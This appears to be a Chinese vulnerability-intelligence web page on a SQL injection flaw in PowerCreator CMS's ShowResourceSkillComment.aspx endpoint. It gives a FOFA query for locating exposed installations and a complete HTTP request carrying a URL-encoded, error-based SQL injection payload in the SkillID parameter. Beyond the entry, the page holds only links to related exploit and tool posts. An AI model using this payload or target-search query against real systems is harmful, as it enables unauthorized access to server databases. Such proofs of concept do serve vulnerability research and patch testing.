PowerCreator接口ShowResourceSkillComment.aspx存在sql注入漏洞

0695

PowerCreator接口ShowResourceSkillComment.aspx存在sql注入漏洞

PowerCreator接口 ShowResourceSkillComment.aspx存在sql注入漏洞。攻击者可利用该漏洞获取服务器上的信息。

fofa

app="PowerCreator-CMS"
image

poc

GET /ShowResourceSkillComment.aspx?rid=3&SkillID=1%20AND%204312%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284312%3D4312%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28120%29%2BCHAR%28118%29%2BCHAR%28113%29%29%29 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: ASP.NET_SessionId=l2wuj2tri5e554020jeezoyw; language=simpleChineses
Pragma: no-cache
Cache-Control: no-cache
© 版权声明
文章版权归作者所有,转载请标明出处。
THE END
漏洞情报
喜欢就支持一下吧
点赞5 分享
李白的头像-李白你好永久会员
李白你好VIP社区-网络安全情报攻防站介绍【请耐心看完】-李白你好
李白你好VIP社区-网络安全情报攻防站介绍【请耐心看完】
李白你好VIP社区-网络安全情报攻防站介绍【请耐心看完】
2个月前 1750
Vshell-listens-李白你好
Vshell-listens
Vshell-listens
9个月前 1170
证书列表【包下证系列】-李白你好
证书列表【包下证系列】
证书列表【包下证系列】
2个月前 1062
2025渗透攻防相关工具集合-李白你好
2025渗透攻防相关工具集合
2025渗透攻防相关工具集合
3个月前 754
红队武器库漏洞利用工具合集整理-李白你好
红队武器库漏洞利用工具合集整理
红队武器库漏洞利用工具合集整理
8个月前 620
【涉我威胁预警】河南某教育科技有限公司涉嫌数据泄露-李白你好
【涉我威胁预警】河南某教育科技有限公司涉嫌数据泄露
【涉我威胁预警】河南某教育科技有限公司涉嫌数据泄露
1个月前 573
相关推荐
全量漏洞文库新增漏洞-2025.03.18-李白你好
全量漏洞文库新增漏洞-2025.03.18
全量漏洞文库新增漏洞-2025.03.18
1个月前 202
Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)-李白你好
Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)
Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)
1个月前 201
安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞-李白你好
安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞
安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞
1个月前 182
Ollama未授权访问漏洞(CNVD-2025-04094)-李白你好
Ollama未授权访问漏洞(CNVD-2025-04094)
Ollama未授权访问漏洞(CNVD-2025-04094)
1个月前 175
Guns后台任意文件上传漏洞-李白你好
Guns后台任意文件上传漏洞
Guns后台任意文件上传漏洞
3个月前 151
全量漏洞文库新增漏洞-2025.02.27-李白你好
全量漏洞文库新增漏洞-2025.02.27
全量漏洞文库新增漏洞-2025.02.27
2个月前 136
全量漏洞文库新增漏洞-2025.03.09-李白你好
全量漏洞文库新增漏洞-2025.03.09
全量漏洞文库新增漏洞-2025.03.09
1个月前 134
Vite开发服务器任意文件读取漏洞(CVE-2025-30208)-李白你好
Vite开发服务器任意文件读取漏洞(CVE-2025-30208)
Vite开发服务器任意文件读取漏洞(CVE-2025-30208)
1个月前 128
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片

    暂无评论内容